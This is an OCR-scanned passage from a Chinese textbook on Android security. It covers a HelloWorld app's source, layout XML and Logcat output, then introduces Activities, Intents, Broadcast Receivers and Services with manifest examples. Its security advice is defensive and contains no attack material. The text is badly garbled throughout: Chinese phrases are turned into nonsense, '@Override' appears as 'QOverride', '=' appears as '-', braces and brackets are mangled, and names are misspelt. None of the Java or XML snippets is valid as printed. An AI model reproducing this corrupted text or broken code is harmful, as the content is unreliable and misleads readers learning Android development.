Create( ) 方 法 ， 在 其 中 增加 自 定 义 的 功能 ， 如 设置 屏幕 显示 或 UI 的 外 观 ， 以 及 


3554:device-1 


























































































































图 2.13  HelloWorldActivity Jf 
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向 logcat 窗口 输出 日 志 信 息 。 屏 幕 上 显示 的 UI 界面 布局 通过 setContentView 
(R. layout. main) 方法 实现 。 如 果 程 序 有 多 个 屏幕 显示 界面 ， 可 通过 setContentView( ) 
方法 为 每 个 屏幕 显示 界面 导入 不 同 的 UI 布局 文件 ， 如 以 R. layout. secondlayout 作为 
setContentView( ) 的 参数 ， 就 是 把 secondlayout. xml 布局 文件 中 定义 的 布局 导入 调用 
该 方法 的 Activity 界面 。 类 文件 R 提供 了 一 种 在 Java 代码 中 引用 定义 在 xml 文件 中 
布局 或 变量 的 方法 ， 相 当 于 视图 或 xml 文件 同 Java 代码 之 间 衔 接 的 桥梁 。 在 代码 
段 4 的 最 后 ,使 用 log.v (“Hello World", “Hello LogCat!”) 方法 向 日 志文 件 中 输 
出 “Hello LogCat!” 日 志 信 息 。 同 其 他 级 别 的 日 志 函 数 相 比 ， 如 调试 ai 和 
警告 (warming) 等 ，Log.v 日 志 郴 数 用 于 显示 详细 的 日 志 人 信息。 在 log v 
(“Hello World", “Hello LogCat!") 语句 中 ，“Hello World” 是 日 志 的 事件 标签 
“Hello Logcat!” 是 相应 日 志 事 件 的 值 ， 也 就 是 日 志 信息 。 



























































package com.androidsecurity.helloworld; 


import android.app.Activity; 
import android.os.Bundle; 
import android.util.Log; 


public class HellloWorldActivity extends Activity { 
/** Called when the activity is first created. */ 
QOverride 
public void onCreate(Bundle savedInstanceState) ( 
super.onCreate(savedInstanceState); 
setContentView(R.layout.main); 
Log.v("Hello World", "Hello LogCat!"); 


代码 段 4 HelloWorldActivity 源码 




















屏幕 显示 界面 /可 视 组 件 的 布局 或 结构 使 用 XML 文件 定义 。 由 于 本 节 解 析 的 应 
用 程序 只 有 一 个 Activity， 因 此 只 定义 了 一 个 布局 文件 ， 即 /res/layouts/main. xml X 
件 。 该 布局 源码 如 代码 段 5 所 示 。 基 本 上 ， 该 布局 只 用 了 一 个 线 型 布局 Linearlay- 

ut， 并 在 其 中 添加 TextView 组 件 显示 文本 信息 ， 通 过 @ string/hello 告诉 应 用 程序 
显示 存储 在 名 为 “hello” 变 量 中 的 字符 串 ， 该 变量 在 /res/values/strings. xml 字符 串 
文件 中 定义 ， 如 代码 段 6 所 示 。 此 代码 段 内 定义 了 两 个 字符 串 ， 即 变量 名 为 
"name" 的 字符 串 “Hello World，HelloWorldActivity!” 和 字符 串 变 量 名 为 “app_ 
name” 的 “HelloWord”。 其 中 ， 变 量 名 为 “app_ name” 的 字符 串 被 Manifest. xml 
文件 引用 。 

图 2. 14 所 示 为 Eclipse 软件 的 Java 视图 下 的 控制 台 和 窗口 。 从 图 中 可 见 ， 该 应 
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<?xml version-"1.0" encoding-"utf-8"?» 

«LinearLayout 

xmlns:android-"http://schemas.android.com/apk/res/android" 
android:layout  width-"fill parent" 
android:layout  height-"fill _ parent” 
android:orientation-"vertical" 


«TextView 
android:layout  width-"fill parent" 
android:layout  height-"wrap content" 
android:text-"8(string/hello" /> 


«/LinearLayout» 
代码 段 5 main. xml 文件 


«?xml version-"1.0" encoding-"utf-8"?» 
«resources» 


«string name-"hello"»5Hello World, 
HellloWorldActivity!«/string» 
«string name-"app - name ea 


«/resources» 


代码 段 6 strings. xml 文件 


用 程序 (HelloWorld. apk) 在 模拟 器 启动 之 后 被 安装 在 模拟 右上， 随即 打开 此 应 
用 程序 的 Activity, arie com. iE) helloworld. HelloWorldActivity 类 。 
要 注意 的 是 ， 该 Activity 是 通过 包 名 “com. androidsecurity. helloworld” 被 引用 和 
开启 的 。 














a HellloMorld] Android Launch! 

1 - HellloWorld] adb is running normally. 

1 - HellloMorld] Performing com.androidsecuirty.helloworld.HellloWorldActivity activity launch 

1 - HellloMorld] Automatic Target Mode: launching new emulator with compatible AVD 'device-1' 

[2012-05-01 11:54:11 - HellloMorld] Launching a new emulator with Virtual Device 'device-1* 

[2012-05-01 11:54:15 - Emulator] 2012-05-01 11:54:15.259 emulator-arm[9846:1107] Warning once: This application, or a library it uses, is using NSQuickÜrawV 
[2012-05-01 11:54:15 ~ HellloMorld] New emulator found: emulator-5554 





- HellloWorld] HOME is up on device 'emulator-5554' 
0 - HellloWorld] Uploading HellloWorld.apk onto device 'emulator-5554* 
:154:50 - HellloWorld] Installing HellloWorld.apk.. 
[2012-05-01 11:55:11 - HellloWorld] Success! 
[2012-05-01 11:55:11 - HellloMorld] Starting activity com.androidsecuirty.helloworld.HellloWorldActivity on device emulator-5554 
[2012-05-01 11:55:13 - HellloWorld] ActivityManager: Starting: Intent { acteandroid.intent.action.MAIN cate[android.intent.category.LAUNCHER] cmpecom.androi 











图 2. 14  HelloWorld 应 用 程序 运行 时 的 控制 台 信 息 
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应 用 程序 用 到 的 Logcat 标签 的 设置 过 程 如 图 2. 15 所 示 。 























v Bl emulator-5554 {device-1} 


com.android.phone 118 8600 ， — 

com.android.inputmethod.pinyin 113 8601 Logcat Message Filter Settings 

com.android.launcher 144 8602 Filter logcat messages by the source's tag, pid or minimum log level. 
systern process 61 Empty fields will match all messages. 











com.android.systemui 121 
«om.android.settings 161 
android.process.acore 181 
com.android.deskciock 1950 
com.android.protips 210 
cor.android.quicksearchbox 226 
€om.android.music 237 
«om.android.defcontainer 247 
android.process.media 256 
com.android.emait 269 
com.android.mms 287 
com.. svox. pico. 315 








| Saved Filters r= 
| All messages (no filters) 
Hello World 








图 2.15 HelloWorld 应 用 程序 的 Logcat 标签 设置 过 程 


2.5 小结 


本 章 主要 探讨 了 Android 软件 栈 及 其 中 各 层 ， 详 细 分 析 了 Linux 内 核 及 Android 
系统 的 安全 机 制 。 讨 论 了 Zygote 和 Android 系统 的 启动 过 程 ， 搭 建 了 Android 开发 
测试 环境 ， 介 绍 了 Android SDK 提供 的 各 种 工具 。 最 后 ， 以 一 个 典型 的 Android 程 
序 为 例 , 分 析 了 Android 项 目 与 应 用 程序 的 结构 。 通 过 本 章 ， 读 者 应 该 能 够 熟悉 
Android 软件 栈 上 的 各 种 术语 。 


第 3 章 Android 应 用 程序 体系 结构 


本 章 主要 介绍 Android 应 用 程序 的 体系 结构 ， 构 成 应 用 程序 的 各 种 组 件 ， 并 使 
用 Logcat 工具 演示 这 些 组 件 在 应 用 程序 运行 时 是 如 何 工作 的 。 随 后 ， 本 章 将 讨论 
Android 应 用 程序 生命 周期 的 各 个 阶段 。 在 本 章 结束 时 ， 读 者 将 能 够 描述 出 构成 
Android 应 用 程序 的 典型 组 件 ， 在 什么 时 候 可 以 使 用 这 些 组 件 ， 以 及 理解 应 用 程序 
生命 周期 的 各 个 阶段 。 





3.1 应 用 程序 组 件 


典型 的 Android 应 用 程序 通常 都 会 具有 丰富 的 功能 ， 例 如 内 置 的 时 钟 (Clock) 
应 用 程序 ， 其 基本 功能 包括 显示 时 间 (时 区 )、 设 置 曾 钟 和 设置 秒表 。 在 时 钟 应 用 
程序 中 ， 主 要 有 三 个 不 同 的 屏幕 显示 界面 。 除 了 这 些 可 见 的 功能 外 ， 其 功能 还 包括 
同 后 端 服务 器 进行 通信 ， 用 以 更 新 时 间 、 在 后 台 运 行 Service 组 件 维持 闹钟 功能 ， 
以 及 同 内 置 处 理 器 时 钟 同 步 等 。 因 此 ， 即 便 是 一 个 简单 的 Android 应 用 程序 ， 也 会 
有 多 个 构成 模块 。Android 应 用 程序 主要 有 四 种 组 件 : Activity (活动 ) Broadcast 
Receiver (广播 接收 器 ) Content Provider. (内 容 提 供 者 ) 和 Service (服务 ) 。 这 些 
组 件 使 用 被 称 为 “Intent (意图 )” 的 消息 体 进行 彼此 交互 , 或 是 同 其 他 应 用 程序 
的 组 件 交互 。 如 图 3. 1 所 示 ， 图 中 介绍 了 Android 应 用 程序 的 主要 组 件 。 




















VMI 应 用 程序 1] VM[ 应 用 程序 2] VM[ 应 用 程序 ] 


- 
Service 
Broadcast Receiver Broadcast Receiver 
En POVIE TET Broadcast Receiver 


3.1 Android 应 用 程序 组 件 








3.1.1 Activity 








基本 上 Activity 就 是 用 户 看 到 的 或 与 之 进行 可 视 交 互 的 屏幕 显示 界面 ， 是 An- 
droid 应 用 程序 的 可 视 用 户 接口 (User Interface, UI) 。 大 多 数 的 应 用 程序 都 会 包含 
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多 个 Activity， 每 一 个 Activity 对 应 一 个 用 户 能 够 看 到 的 或 与 之 交互 的 屏幕 显示 界 
面 ， 在 这 些 Activity 之 间 ， 用 户 可 以 随意 地 切换 。 在 这 种 无 缝 切换 效果 的 用 户 体验 
下 ， 用 户 能 够 以 任何 顺序 ( 除 少量 例外 ) 启动 应 用 程序 中 不 同 的 Activity; Wi EL, 
用 户 还 可 以 使 用 Intent (有 关 Intent 的 内 容 在 本 章 后 续 部 分 中 会 介 绍 到 ) 启动 其 他 
应 用 程序 的 Activity， 如 图 3.2 所 示 。Android 应 用 程序 启动 时 会 自动 打开 一 个 
Activity， 通 过 该 Activity， 用 户 可 以 在 应 用 程序 中 的 不 同 Activity 或 组 件 之 间 切 换 。 
ARAT, 应 用 程序 都 会 设计 一 种 使 用 户 能 够 回 到 上 一 个 ÎN Activity 界面 的 方式 。 
总 之 ,通过 Activity 提供 的 UI 屏幕 界面 ， 用 户 就 能 够 同 应 用 程序 进行 各 种 交互 ， 使 
用 应 用 程序 的 各 种 功能 。 应 用 程序 中 ， 一 些 常 见 的 Activity 使 用 例子 如 下 : 

e 应 用 程序 的 登录 界面 。 

e 创建 一 封 电子 邮件 的 界面 。 

e 通过 电子 邮件 发 送 照片 的 界面 。 








应 用 程序 2 





图 3.2 Android 应 用 程序 之 间 的 Activity 交互 


应 用 程序 通常 由 多 个 Activity 组 成 。 当 应 用 程序 启动 时 ， 会 有 一 个 “main 
( 主 )”Activity 被 启动 ， 作 为 UI 显示 在 屏幕 上 ， 呈 现 给 用 户 。 

Activity 类 用 于 创建 屏幕 显示 界面 ， 程 序 开发 者 可 以 使 用 setContentView 
(View) 函数 创建 UI 组 件 ， 也 就 是 屏幕 显示 界面 的 布局 。 创 建 自 定义 的 Activity 
类 ， 首 先 需 要 继承 “Activity” 父 类 ， 然 后 再 在 自 定 义 的 Activity 子 类 中 实现 (E 
写 ) 父 类 中 相应 的 回调 函数 ， 这 些 函 数 会 在 Activity 创建 ， 变 换 ( 如 暂停 、 终 止 
和 转 入 后 台 )， 以 及 销毁 时 被 系统 回调 并 执行 。Activity 类 有 很 多 的 回调 函数 ， 而 
OnCreate( ) 和 OnPause( ) 函数 是 其 中 最 重要 的 ， 也 是 使 用 最 频繁 的 回调 函数 。 

€ onCreate( Bundle) Kt: 在 Activity 初始 化 时 调用 ， 每 个 Activity 类 都 需要 实 

岗 这 个 函数 。 通 常 ， 在 该 函数 内 调用 setContentView(int) PAŽE X Activity HJ UI 布 
: , 3 EYES HERZ. findViewById(int) ， 获 取 本 地 资源 并 与 其 进行 交互 。 

€ onPause( ) PAZ; 当 用 户 离开 Activity 时 ， 调 用 此 函数 ， 并 在 函数 内 执行 Ac- 
tivity 状态 信息 存储 操作 ， 以 及 其 他 重要 的 操作 。 

此 外 , 在 Activity 类 中 ,还 有 一 些 其 他 的 重要 也 数 ， 包 插 : onStart( ) 、onRe- 
p ) enResume( ) , onStop( ) ， 以 及 onDestroy() 。 在 本 章 后 续 ， 讨 论 Activity 的 

命 周期 时 ， 将 介绍 到 这 些 函 数 。 

在 代码 段 1 中 ， 定 义 了 一 个 典型 的 Activity 类 ， 起 名 为 “ActivityA”。 该 类 先是 
继承 了 Activity 基 类 ( 即 Activity 类 ) ， 定 义 了 一 些 私 有 成 员 变量 。 然 后 ， 重 写 并 实 
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现 了 基 类 中 的 部 分 回调 函数 ， 尤 其 是 onCreate( ) PAZ, YE onCreate ( ) KAN, Ac- 
tivityA 类 通过 使 用 setContentView( ) 和 findViewByld( ) 函数 定义 了 ActivityA 的 UI 界 
面 布局 。 


public class ActivityA extends Activity { 





private String mActivityName; 

private TextView mStatusView; 

private TextView mStatusAllView; 

private StatusTracker mStatusTracker = 
StatusTracker.getInstance(); 


QOverride 
public void onCreate(Bundle savedInstanceState) { 
super.onCreate(savedInstanceState); 
setContentView(R.layout.activity a); 
mActivityName - getString(R.string.activity a); 
mStatusView = (TextView)findViewById(R. 
id.status view a) 
mStatusAllView = 
(TextView)findViewById(R.id.status view all a) 
mStatusTracker.setStatus(mActivityName, 
getString(R.string.on  create)); 
Utils.printStatus(mStatusView, mStatusAllView); 
} 


代码 段 1 ActivityA 类 实现 的 onCreate( ) KX 


在 Android 应 用 程序 中 ， 所 有 的 Activity 都 需要 在 Manifest 文件 内 声明 ， 否 则 将 
能 在 系统 中 注册 ， 未 声明 的 Activity 也 就 无 法 被 启动 。 

在 Manifest 文件 中 声明 Activity 的 实现 如 代码 段 2 所 示 。 使 用 < activity > 标签 
声明 Activity 类 ， 该 标签 是 < application > 标签 的 子 标签 。 在 < activity > 标签 内 ， 能 
EX Activity 的 属性 ， 如 属性 “android: name” 用 于 指 eaa 的 Activity 的 类 名 。 
此 外 ,在 «activity > 标签 中 ， 还 可 以 包含 Intent 过 滤器 (通过 < intent-filter > 标签 
EX), UK Activity 类 使 用 的 元 数据 。 


«application android:label-"8string/app name" 
android:icon-"(drawable/ic  launcher"» 





«activity android:name-".ActivityA" 
android:launchMode-"singleTask"» 


«intent-filter» 
«action android:name-"android.intent.action.MAIN" /» 


«category android:name-"android.intent.category.LAUNCHER" /» 
«/intent-filter» 
«/activity» 
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«activity android:name-".ActivityB" /> 
«activity android:name-".ActivityC" /» 


«/application» 





代码 段 2 Manifest 文件 中 的 Activity 声明 


Manifest 文件 需要 为 应 用 程序 所 有 的 Activity 统一 声明 一 个 启动 人 口 。 如 代码 段 2 
所 示 ， 该 应 用 程序 共有 三 个 Activity: ActivityA ActivityB 和 ActivityC。 其 中 ，Activ- 
ityA J&-E ( main) Activity， 当 打开 应 用 程序 时 ,该 pd 被 启动 。 而 且 ，ActivityA 还 
绑 定 了 一 个 Intent :EJE 28 (| < intent-filter > 标签 ) ， 其 action. (动作 ) 和 category (类 
别 ) 分 别 被 设置 成 “MAIN” 和 “LAUNCHER”。 这 样 ， 就 可 以 让 Android 系统 的 
Launcher? 程序 获得 这 个 Activity , 继而 使 用 户 能 够 借 此 局 动 该 应 用 程序 。 

Manifest 文件 内 的 其 他 Activity 属性 的 详细 信息 请 参阅 下 述 网 站 : http: //de- 
veloper. android. com/guide/topics/manifest/activity- element. html 。 

由 于 Android 应 用 程序 可 以 启动 其 他 应 用 程序 的 Acetivity。 因 此 ， 需 要 对 这 种 特 
定 的 能 力 进行 限制 ， 也 就 是 限制 其 他 应 用 程序 对 指定 Activity 的 启动 能 力 。 在 Man- 
ifest 文件 中 ， 通 过 设置 权限 来 实现 对 这 种 跨 应 用 程序 启动 Activity 的 限制 。 其 他 应 
用 程序 需要 使 用 “use- permission"” 权 限 标签 ， 请 求 对 相应 权限 功能 的 访问 。Activi- 
ty 可 以 使 用 < activity > 标签 的 “android: permission” 属性 设置 Activity 的 权限 ， 限 
制 其 他 应 用 对 该 Activity 的 启动 。 当 其 他 应 用 程序 调用 Context. startActivity ( ) 函数 
或 Activity. startActivityForResult( ) 函数 启动 该 Activity 时 ， 系 统 会 查看 其 权限 ， 若 调 
用 者 不 具有 该 权限 ， 启 动 Activity 的 请 求 会 被 拒绝 。 


3.1.2 Intent 














Intent 是 用 于 激活 其 他 应 用 程序 组 件 (如 Activity, Service 和 Broadcast Receiv- 
er) 的 消息 体 ， 描 述 了 需要 执行 的 动作 或 操作 。 借 助 Intent, Android 系统 提供 了 一 
种 在 运行 之 后 的 应 用 程序 组 件 之 间 的 绑 定 机 制 ， 这 种 机 制 既 可 以 在 同一 个 应 用 程序 
的 组 件 之 间 运 行 ， 也 可 以 在 不 同 的 应 用 程序 组 件 之 间 运 行 。Intent 本 身 就 是 一 个 包 
含 信息 的 对 象 ， 这 些 信 息 可 以 是 需要 执行 的 操作 信息 ， 或 者 对 于 Broadcast Receiver 
组 件 来 说 ， 也 可 以 是 发 生 事件 的 详细 信息 。 

以 纽约 时 报应 用 程序 为 例 ， 在 这 个 应 用 程序 中 ， 有 三 个 不 同 的 Activity， 一 个 
用 于 显示 文章 列表 ， 男 一 e 内 容 ， 还 有 一 个 对 话 框 Activity， 提 供给 
用 户 用 来 标记 喜爱 的 文章 等 。 该 应 用 程序 还 可 以 通过 发 送 含有 文章 链接 电子 邮件 ， 













































































© Launcher, E} Android 系统 的 应 程序 启 动 器 ， 是 Android 系统 内 置 的 应 用 ， 于 显示 安装 在 Android 
设备 上 的 所 有 应 用 程序 。 一 一 译 者 注 
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和 他 人 共享 指定 文章 。 如 图 3.3 所 示 ， 通 过 Intent 可 以 让 用 户 在 不 同 的 Activity 之 
间 切 换 ， 同 应 用 程序 进行 交互 。 


e i 


图 3.3 Intent 用 法 








不 同 的 应 用 程序 组 件 ， 如 Service, Activity 或 Broadcast Receiver， 发 送 Intent 对 
象 时 调用 的 函数 也 各 不 相同 ， 见 表 3. 1。 
表 3.1 发 送 Intent 的 函数 
应 用 程序 组 件 函 数 


Context. startActivity( ) 








Activity Activity. startActivtyForResult( ) 
Activity. setResult( ) 





Context. startService( ) 





Service 
Context. bindService( ) 
Context. sendBroadcast ( ) 
Broadcast Receiver Context. sendOrderedBroadcast (.) 


Context. sendStickyBroadcast( ) 





Intent 对 象 (消息 体 ) 是 一 种 数据 结构 ， 它 被 设计 用 来 存储 事件 信息 或 执行 的 
操作 信息 ， 主 要 包含 两 部 分 信息 内 容 : 

e 执行 的 动作 (Action) 。 

e 执行 动作 相关 的 数据 ， 以 URI (Uniform Resource Identifier， 统 一 资源 标识 ) 
的 形式 表示 。 

下 面 是 几 组 Intent 包含 的 动作 /数据 对 的 例子 : 

€ ACTION . DIAL content; //contacts/people/1 

将 此 人 的 电话 号 码 显 示 在 电话 拨号 器 上 ， 拨 号 呼叫 。 

€ ACTION_ DIAL tel:123 

将 号 码 123 显示 在 电话 拨号 器 上 ， 进 行 呼叫 。 

此 外 ，Intent 对 象 还 可 以 提供 其 他 的 信息 ， 如 下 所 示 : 

€ Category; 指定 执行 动作 的 类 别 信息 。 当 设置 为 CATEGORY LAUNCHER 
时 ， 表 示 接 收 Intent 的 Activity 存在 于 Android 系统 的 Launcher 程序 中 。 

€ Type: 明确 指定 Intent 的 数据 类 型 ， 无 需 系统 判定 。 

€ Component; 指定 处 理 该 Intent 的 目标 组 件 的 名 称 ， 非 必须 项 。 当 设置 为 空 
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时 ， 系 统 会 使 用 Bundle 中 的 其 他 信息 确定 匹配 的 目标 组 件 。 

€ Extras: 附加 信息 的 集合 ， 使 用 android. os. Bundle 类 封装 这 些 信 息 内 容 。 

通过 这 些 属性 ，Intent 能 够 表示 各 种 操作 和 事件 。 例 如 ，Activity 可 以 向 电子 邮 
件 应 用 程序 (e-mail) 发 送 一 个 包含 电子 邮件 地 址 的 Intent 对 象 ， 撰 写 新 的 邮件 。 
Intent 主要 分 为 两 种 不 同 的 类 型 ， 显 式 类 型 的 Intent 和 隐 式 类 型 的 Intent, 
显 式 类 型 的 Intent 中 明确 指出 需要 激活 的 组 件 名 称 (对 应 的 类 名 )。 一 般 情况 
下 ， 由 于 应 用 程序 并 不 知道 其 他 应 用 程序 内 组 件 的 名 称 ， 因 此 这 种 类 型 的 Intent 通 
常用 在 同一 个 应 用 程序 的 内 部 组 件 之 间 。 典 型 的 显 式 类 型 Intent 的 调用 形式 如 下 : 

Intent i = new Intent(this, < activity name >. class) ; 

相反 ， 隐 式 类 型 的 Intent 用 于 激活 其 他 不 同 应 用 程序 的 组 件 。 例 如 ， 照 片 应 用 
程序 (Photo) 向 电子 邮件 应 用 程序 (e-mail). 发 送 电 子 邮 件 Intent 对 象 ， 从 而 使 用 
电子 邮件 发 送 照片 。 这 种 类 型 的 Intent 不 需要 提供 目标 组 件 的 名 称 ， 而 是 通过 系统 
解析 ， 找 到 与 之 匹配 的 目标 组 件 。Intent 解析 机 制 主要 通过 组 件 提供 的 Intent 过 滤 
IEK, Intent 过 滤 需 用 于 告知 系统 该 组 件 能 够 处 理 哪 些 Intent 对 象 。 系 统 将 Intent 
对 象 同 过 滤器 进行 比较 ， 从 而 选 出 相 匹 配 的 目标 组 件 交 付 Intent 对 象 。Intent 过 滤 
器 提供 了 一 种 机 制 ， 使 组 件 可 以 指定 其 希望 处 理 的 Intent 对 象 ， 这 可 以 用 于 限制 对 
某 些 组 件 的 激活 。 例 如 ， 当 组 件 没有 设 定 Intent 过 滤器 时 ， 那 么 它 只 能 接收 显示 类 
型 的 Intent 对 象 。 但 有 一 点 需要 注意 的 是 ， 不 要 依赖 于 Intent 过 滤 需 作为 确保 软件 
安全 的 手段 ， 因 为 别人 总 是 会 有 办 法 发 送 显 式 类 型 的 ntent 给 它 ， 从 而 绕 过 Intent 
过 滤 机 制 。 因 此 ， 需 要 为 组 件 定义 特定 的 权限 ， 限 制 通过 Intent 对 特定 组 件 的 访 
问 。 而 且 ， 最 好 只 使 用 Intent 对 象 传递 有 限 的 数据 。 对 于 敏感 的 信息 ， 比 如 密码 等 
言 息 ， 绝 对 不 能 使 用 Intent 对 象 传 递 ， 因 为 它们 很 有 可 能 会 被 恶意 组 件 接收 。 

典型 的 隐 式 类 型 的 Intent 对 象 调用 形式 如 下 : 

Intent I = new Intent( Intent. ACTION. VIEW , Uri. parse (http://www. google. com) ) ; 

当 系 统 将 Intent 对 象 和 过 滤器 进行 比较 时 ， 系 统 主要 测试 /比较 Intent 对 象 内 的 
三 个 字段 ， 见 表 3.2。 因 此 ， 和 希望 获得 Intent 对 象 的 组 件 需要 在 它 的 Intent 过 滤器 
中 提供 相应 字段 信息 。 


































































































表 3.2 Intent 字段 及 其 说 明 


Intent 字段 用 ik 














执行 动作 的 名 字 或 已 经 发 生 的 事件 名 字 构 成 的 字符 串 ， 如 ACTION. CALL, ACTION - 
TIMEZONE. CHANGED 

执行 动作 相关 的 操作 数据 ,包括 URI 和 MIME 两 种 类 型 的 数据 。 例 如 ，ACTION_ 
Data VIEW 动作 一 般 关 联 URL 类 型 的 数据 ，ACTION_CAIL 则 需要 处 理 与 相关 联 的 tel; data 
类 型 的 数据 

提供 有 关 处 理 / 服 务 Intent 对 象 的 目标 组 件 类 别 的 附加 信息 ， 一 般 为 CATEGORY _ 
HOME, CATEGORY_LAUNCHER, CATEGORY_BROWSABLE 等 


Action 






































Category 
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图 3.4 和 图 3.5 显示 的 分 别 是 电话 (Phone) 应 用 程序 和 浏览 器 (Browser) 应 
用 程序 的 Manifest. xml 文件 内 容 ， 这 两 个 应 用 程序 都 是 Android 系统 内 置 的 应 用 程 
序 。 因 此 ， 其 他 的 应 用 程序 可 以 使 用 它们 拨打 电话 和 浏览 网 页 。Phone 应 用 程序 提 
供 了 多 个 Intent 过 滤器 ， 可 以 处 理 多 个 Intent 动作 ， 如 与 “tel. ”类 型 数据 相关 联 
的 android. intent. action. CALL 动作 。 当 某 个 应 用 程序 试图 拨打 电话 时 ,将 向 Phone 
应 用 程序 发 送 关 联 该 数据 类 型 ( 即 电话 号 码 ) 的 Intent 对 象 。Browser 应 用 程序 提 
供 了 用 于 处 理 android. intent. action_VIEW 动作 的 Intent 过 滤器 等 ， 这 使 其 他 应 用 程 
序 能 够 向 Browser 应 用 程序 发 送 URL 地 址 。 





图 3.4 Phone 应 用 程序 的 Manifest. xml 文件 


«activity android:theme="@style/BrowserTheme" android:label-"8string/application name" android:name="BrowserActivity" 
Xintent-filter» 
Xaction andrcid:name-"android.intent.action.VIEW" /> 
«category android:name-"android.intent.category.DEFAULT" /> 
Xcategory andrcid:name-"android.intent.category.BROWSABLE" /> 
«data android:scheme-"http" /> 
«data android:scheme-"https" /> 
Xdata android:scheme-"about" /> 
«data android:schere-"javascript" /> 
X«/intent-filcer» 
xintent-filter» 
Xaction andrcid:name-"android.intent.action.VIEW" /> 
«category android:name-"android.intent.category.BROWSABLE" /> 
Xcategory androcid:name-"android.intent.category.DEFAULT" /> 
«data android:scheme-"http" /> 
Xdata android:scheme-"https" /» 
«data andrcid:scheme-"inline" /> 
«data android:mimeType-"text/html" /> 
«data android:mimeType-"text/plain" /> 
«data android:mimeType-"application/xhtmlexml" /> 
Xdata android:mimelype-"appiication/vnd.wap.xhtmisxml" /> 
«/intent-filter» 


图 3.5 Browser 应 用 程序 的 Manifest. xml 文件 


3.1.3 Broadcast Receiver 


Broadcast Receiver 用 于 人 处理 Intent 对 象 ， 该 组 件 通 过 订阅 特定 的 Intent 对 象 指 
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定 的 动作 ， 作 为 Android 应 用 程序 同系 统 组 件 之 间 相 互通 信 的 一 种 方式 。 在 收 到 激 
活 的 Intent 对 象 之 前 ，Broadcast Receiver 保持 睡眠 状态 。 激 活 之 后 ，Broadcast Re- 
ceiver 将 执行 特定 的 动作 。Android 系统 和 应 用 程序 都 可 以 对 外 广播 Intent 对 象 。 不 
过 ， 只 有 在 安全 权限 之 内 ， 订 阅 了 这 些 Intent 对 象 指定 动作 的 组 件 才 能 够 接收 到 。 
当 Intent 对 象 被 广播 出 去 后 只 有 具备 所 需 权 限 且 已 经 订阅 了 该 Intent 对 象 指 定 动 
作 的 Broadcast Receiver 才能 被 系统 激活 ， 接 收 该 Intent 对 象 并 执行 相应 操作 。 

Android 系统 自 带 了 多 种 系统 事件 (如 电池 电量 低 、 收 到 电话 或 短信 等 事件 )， 
作为 Intent 对 象 内 部 Action 字段 的 动作 值 ， 由 系统 以 广播 Intent 对 象 的 形式 对 外 发 
布 。 如 下 是 一 些 Android 系统 自 带 的 广播 Intent 动作 : 

€ ACTION TIME TICK 

€ ACTION TIME CHANGED 

€ ACTION. TIMEZONE CHANGED 

€ ACTION BOOT COMPLETED 

€ ACTION. PACKAGE ADDED 

€ ACTION PACKAGE CHANGED 

€ ACTION PACKAGE REMOVED 

€ ACTION PACKAGE RESTARTED 

€ ACTION PACKAGE DATA, CLEARED 

€ ACTION UID REMOVED 

€ ACTION. BATTERY CHANGED 

€ ACTION POWER, CONNECTED 

€ ACTION POWER, DISCONNECTED 

€ ACTION SHUTDOWN 

WEJ Android RRA LBS HTEEFE ZL— , Mep (Alarm). 应 用 程序 订阅 的 系统 
广播 动作 主要 有 两 种 : ACTION. TIME _ CHANGED 和 ACTION _ TIMEZONE _ 
CHANGED, Broadcast Receiver 组 件 本 身 不 具有 用 户 界面 ， 但 是 应 用 程序 可 以 在 Ac- 
tivity 类 中 通过 onReceive( ) 回调 函数 接收 广播 并 执行 相应 的 操作 。 这 时 ， 该 Activity 
类 需要 继承 android. content. BroadcastReceiver 类 ， 并 且 重 写 父 类 的 onReceive ( ) 
函数 。 

Android 应 用 程序 可 以 向 自己 或 其 他 应 用 程序 发 送 广播 Intent。 不 过 ， 需 要 在 
Manifest. xml 文件 中 注册 这 些 Broadcast Receiver 组 件 ， 才 能 将 应 用 程序 注册 到 
Android 系 统 中 ， 从 而 接收 特定 的 广播 mtent 动作 。 以 时 钟 (Time) 应 用 程序 为 例 ， 
要 想 接 收 ACTION. TIME. CHANGED 和 ACTION_TIMEZONE_CHANGED 广播 Intent 
动作 ， 需 要 在 Time 应 用 程序 的 Manifest. xml 文件 中 声明 上 述 注册 及 订阅 的 事件 动 
作 。 这 样 ， 该 程序 的 Broadcast Receiver 才能 注册 到 Android 系统 中 ， 当 订阅 的 事 
件 动作 发 生 时 ， 再 由 系统 激活 该 程序 的 Broadcast Receiver。Time 应 用 程序 的 
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Broadcast Receiver 组 件 “TimeReceiver 2$" E Manifest. xml 文件 中 声明 的 注册 如 
代码 段 3 所 示 ， 该 类 重 写 了 父 类 (android. content. BroadcastReceiver 类 ) 的 回调 
函数 onReceive( ) 。 

要 想 接 收 特定 广播 发 出 的 mtent， 需 要 明确 地 请 求 所 需 的 权限 。 





«receiver android:name = ".TimeReceiver"» 
«intent-filter» 
«action 
android:name-android.intent.action.TIME  |CHANGED"/» 
«action 


android:name-android.intent.action.TIME ZONE _ CHANGED""/» 
«/intent-filter» 
«/receiver» 


代码 段 3 注册 Broadcast Receiver 组 件 


对 于 一 些 特 定 的 广播 Intent 动作 ， 应 用 程序 需要 请 求 所 需 的 权限 才能 接收 。 例 
如 ， 接收 BOOT_COMPLETED 广播 Intent 动作 ， 则 需要 应 用 程序 具有 RECEIVE 
BOOT COMPLETED 权限 。 此 外 ，Broadcast Receiver 的 一 些 权 限 能 够 限制 向 关联 的 
Broadcast Receiver 组 件 交 付 广 播 的 Intent 对 象 。 例 如 ， 当 系统 试图 向 Broadcast 
Receiver 组 件 交 付 广播 Intent 对 象 时 ， 首 先 会 检查 Broadcast Receiver 的 权限 。 如 果 
该 Broadcast Receiver 没有 所 需 权限 ， 则 系统 会 取消 向 其 交付 该 广播 的 Intent 对 象 。 


3.1.4 Service 


Service 是 用 于 Android 应 用 程序 在 后 台 执 行 耗 时 操作 的 组 件 ， 它 没有 用 户 界 
面 ， 仪 在 后 台 执行 任务 ， 如 闹钟 、 音 乐 播放 器 应 用 程序 等 。 其 他 的 Android 应 用 程 
序 可 以 在 前 台 运 行 ， 然 而 Service 只 能 在 后 台 运 行 ， 甚 至 当 用 户 切 换 到 其 他 的 应 用 
程序 组 件 或 应 用 程序 时 。 而 且 ， 应 用 程序 组 件 可 以 通过 将 自己 “ 绑 定 ”到 Service 
上 ， 与 它 在 后 台 交 互 。 例 如 ， 某 个 应 用 程序 组 件 可 以 绑 定 到 音乐 播放 器 的 Service 
上 ， 在 需要 时 同 它 进行 交互 。 因 此 ，Service 可 以 有 两 种 状态 : 启动 和 绑 定 。 

